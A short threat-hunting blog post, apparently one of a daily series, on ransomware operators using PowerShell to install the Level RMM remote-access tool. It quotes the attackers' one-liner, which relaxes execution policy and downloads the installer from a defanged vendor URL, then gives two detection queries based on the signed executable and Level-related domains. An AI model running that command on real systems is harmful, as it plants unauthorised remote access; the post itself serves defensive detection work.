184. Ransomware Gangs Abuse PowerShell to Install Level RMM

Hello everyone!

RMMs. Yes, again. This one isn't new, but I don't see it often enough, so I decided some detection and hunting ideas for it. I'm talking about Level RMM.

According to this report, the adversary leveraged PowerShell to download the installer:

powershell $env:LEVEL_API_KEY = <API Key>; Set-ExecutionPolicy RemoteSigned -Scope Process -Force; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $tempFile = Join-Path ([System.IO.Path]::GetTempPath()) "install_windows.exe"; Invoke-WebRequest -Uri "hxxps://downloads[.]level[.]io/install_windows.exe" -OutFile $tempFile;

The executable is signed by Level Software, Inc. Why not to use it for detection?

event_type: "processcreatewin"

AND

proc_file_sig: "Level Software"

Another detection opportunity is searching for Level RMM-related domains:

event_type: "dnsreqwin"

AND

dns_rname: ("level.io" OR "rmm.dev")

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge